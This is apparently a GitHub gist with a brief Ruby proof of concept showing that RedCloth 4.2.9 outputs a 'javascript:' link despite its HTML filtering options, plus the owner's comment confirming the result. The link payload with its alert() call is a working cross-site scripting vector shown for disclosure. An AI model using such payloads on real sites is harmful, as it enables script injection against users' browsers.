Create a gist now

Instantly share code, notes, and snippets.

require 'redcloth'
print RedCloth.new('["clickme":javascript:alert%28/XSS/.source%29]', [:filter_html, :filter_styles, :filter_classes, :filter_ids]).to_html
# Result:
# <p><a href="javascript:alert%28/XSS/.source%29">clickme</a></p>
@co3k
Owner
co3k commented Feb 29, 2012

I've confirmed this with RedCloth-4.2.9 (installed by RubyGems).

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment